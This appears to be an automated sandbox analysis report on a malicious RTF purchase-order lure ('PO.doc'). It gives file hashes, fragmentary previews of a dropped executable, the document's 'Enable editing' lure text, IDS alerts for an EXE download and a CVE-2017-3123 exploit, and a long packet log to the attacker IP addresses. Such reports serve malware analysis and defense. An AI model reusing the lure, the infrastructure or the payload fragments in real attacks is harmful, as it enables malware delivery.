                                                                                          SHA1:F8D784BF4D4737B3262895B31C9BF63CC69245C1
                                                                                          SHA-256:CD5B6D9887C45388175C80DEE322B7AD66A9F9D78B7A670232CF1427ED1072E5
                                                                                          SHA-512:AE9430398AEF04796A6527292627257DA5F275EC9F3E901B0F6FA07D41BFE042723D2830BDB3560F5FB19F5C03D83ABC5031F88DC78C100FAA6C6953AEC482B9
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9u.g..............0..n..........J.... ........@.. ....................................@.....................................O....................................u..T............................................ ............... ..H............text...Pl... ...n.................. ..`.rsrc................p..............@..@.reloc...............v..............@..B................,.......H.......<9...............g...............................................0..1........~.......o.........,...s.....~......o........+..*&.(......*B.(........}....*..{....*.0...........(.............o....*Z.(........(.......+..*r.(....-.~.....(....o....+..*....0..X.......s....%..o.....%..o.....%...o.....%..$o.....%..Ho.....%..o.....%..$o..........s.........*..{....*"..}....*.~....*.0..m........s....}.....(........o.....+5..( .......(!....+...(......("...o#......%.Y......-....($..

                                                                                          C:\Users\user\Desktop\~$PO.doc

                                                                                          Download File
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):162
                                                                                          Entropy (8bit):2.4797606462020307
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                          MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                          SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                          SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                          SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                          Malicious:true
                                                                                          Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                          Static File Info

                                                                                          General

                                                                                          File type:Nim source code, Non-ISO extended-ASCII text, with very long lines (36335), with CRLF, CR, LF line terminators
                                                                                          Entropy (8bit):2.498018347422732
                                                                                          TrID:
                                                                                          • Rich Text Format (4004/1) 100.00%
                                                                                          File name:PO.doc
                                                                                          File size:716'151 bytes
                                                                                          MD5:62d84deb859c9e770ed6ad64a236c9a2
                                                                                          SHA1:91b2c36414f3f9229a6b40066ed6d0a3d389d1df
                                                                                          SHA256:eaf823ff4d6112a7be24f15d8a3f0fda2512bfae97bc28e3713c7831e8bf5d8a
                                                                                          SHA512:007bd2f3e686b3796f11e9354314cf833790b6402fc1291cbc534328e7dad71044257cf1f2bcc7f000773881954c3c016da21c98fd5d911030ac6508bd4a7af5
                                                                                          SSDEEP:3072:qwAlawAlawAlawAlFlzJ0yJSpBpp/GgA6IkA//OIMKCpCLshlEUh:qwAYwAYwAYwA1iA4pFukA//OaCp0shbh
                                                                                          TLSH:CDE4232DD34E0659DF62427B9B5A1E4506FCB73EF38511A0346C837833EEC2E9226679
                                                                                          File Content Preview:{\rt..{\*\RqdioPFHCJS09K89TFrimc5B7cPbw79nMDDtUj76IBNkRu2SUSWmQEjrIMIYEqHaYys6IwYWukPPCLfqTyau7tUOCD8xR3CDRuFP8L}..{\316771324please click Enable editing from the yellow bar above.The independent auditors. opinion says the financial statements are fairly

                                                                                          File Icon

                                                                                          Icon Hash:2764a3aaaeb7bdbf

                                                                                          Network Behavior

                                                                                          Suricata IDS Alerts

                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                          2024-10-07T14:55:52.210553+02002022050ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M11154.216.19.16080192.168.2.2249163TCP
                                                                                          2024-10-07T14:55:52.331885+02002022051ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M21154.216.19.16080192.168.2.2249163TCP
                                                                                          2024-10-07T14:55:52.331885+02002827449ETPRO EXPLOIT Adobe EMF File Memory Corrpution Vulnerability Inbound (CVE-2017-3123)1154.216.19.16080192.168.2.2249163TCP
                                                                                          2024-10-07T14:55:58.208680+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249164158.101.44.24280TCP
                                                                                          2024-10-07T14:55:59.194589+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249164158.101.44.24280TCP
                                                                                          2024-10-07T14:55:59.768019+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249166188.114.96.3443TCP
                                                                                          2024-10-07T14:56:02.093635+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249167158.101.44.24280TCP
                                                                                          2024-10-07T14:56:02.527569+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249168188.114.97.3443TCP
                                                                                          2024-10-07T14:56:03.310460+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.2249169158.101.44.24280TCP
                                                                                          2024-10-07T14:56:06.132319+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249174188.114.96.3443TCP
                                                                                          2024-10-07T14:56:08.733630+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249176188.114.96.3443TCP
                                                                                          2024-10-07T14:56:12.583444+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.2249180188.114.96.3443TCP

                                                                                          Network Port Distribution

                                                                                          TCP Packets

                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                          Oct 7, 2024 14:55:51.201802015 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:51.307310104 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:51.307425976 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:51.307735920 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:51.312766075 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107069016 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107091904 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107103109 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107111931 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107122898 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107131004 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107141972 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107151985 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107161999 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107172012 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107182026 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.107306004 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.107306004 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.132839918 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.210552931 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.210676908 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.211040974 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.211101055 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.226367950 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.226408005 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.226421118 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.226438999 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.226439953 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.226449013 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.226460934 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.226466894 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.226466894 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.226466894 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.226473093 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.226486921 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.226505041 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.226519108 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.226533890 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.226574898 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.227042913 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.227091074 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.227098942 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.227102041 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.227135897 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.227199078 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.227210999 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.227247953 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.227922916 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.227971077 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.227977037 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.227983952 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.228018999 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.228059053 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.228070974 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.228104115 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.228115082 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.228801012 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.228856087 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.254170895 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.254196882 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.254209042 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.254276991 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.254276991 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.299154043 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.299177885 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.299338102 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.331413984 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.331453085 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.331468105 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.331475973 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.331485987 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.331496954 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.331499100 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.331509113 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.331525087 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.331525087 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.331542969 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.331547976 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.331885099 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.331907034 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.331919909 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.332050085 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.332144022 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.332155943 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.332190990 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.332194090 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.332201958 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.332212925 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.332231045 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.332247972 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.332997084 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.333055973 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.333075047 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.333086967 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.333096981 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.333110094 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.333122969 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.333126068 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.333157063 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.333792925 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.333825111 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.333836079 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.333846092 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.333862066 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.333879948 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.334528923 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.334542036 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.334579945 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.334650993 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.334680080 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.334695101 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.334701061 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.334714890 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.334739923 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.334748030 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.334835052 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.334846020 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.334886074 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.335489035 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.335536003 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.335537910 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.335549116 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.335580111 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.335633039 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.335644007 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.335673094 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.335685968 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.336505890 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.336515903 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.336527109 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.336536884 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.336555004 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.336570978 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.342592001 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.342606068 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.342617035 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.342628002 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.342639923 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.342677116 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.342819929 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.387286901 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.387307882 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.387320042 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.387348890 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.387382030 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.436475039 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436598063 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436604023 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.436609983 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436650991 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436655998 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.436662912 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436674118 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436685085 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436688900 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.436708927 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.436724901 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.436729908 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436742067 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436753035 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436764956 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.436767101 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.436784983 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.436800003 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.436992884 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.437259912 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.437308073 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.437329054 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.437340021 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.437367916 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.437381029 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.437396049 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.437407970 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.437417984 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.437427044 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.437429905 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.437446117 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.437468052 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.437910080 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.437958956 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.438020945 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.438033104 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.438044071 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.438062906 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.438076019 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.438152075 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.438163996 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.438174963 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.438185930 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.438196898 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.438210964 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.438219070 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.438277960 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.438297033 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.438321114 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.438330889 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439205885 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439259052 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439340115 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439349890 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439361095 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439377069 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439378023 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439395905 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439408064 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439419031 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439420938 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439420938 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439428091 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439429998 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439445972 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439455986 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439820051 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439838886 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439850092 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439868927 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439884901 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.439948082 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439959049 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439970016 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439981937 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.439996004 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.440020084 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.440020084 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.440032959 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.440045118 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.440067053 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.440080881 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.440804958 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.440853119 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.440898895 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.440910101 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.440920115 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.440931082 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.440939903 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.440951109 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.440958977 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.440958977 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.440979958 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.440999031 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.441010952 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.441034079 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.441047907 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.441847086 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.441895962 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.441962957 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.441975117 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.441986084 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.441996098 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.442004919 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.442006111 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.442018032 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.442028046 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.442037106 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.442053080 CEST4916380192.168.2.22154.216.19.160
                                                                                          Oct 7, 2024 14:55:52.442063093 CEST8049163154.216.19.160192.168.2.22
                                                                                          Oct 7, 2024 14:55:52.442070007 CEST4916380192.168.2.22154.216.19.160
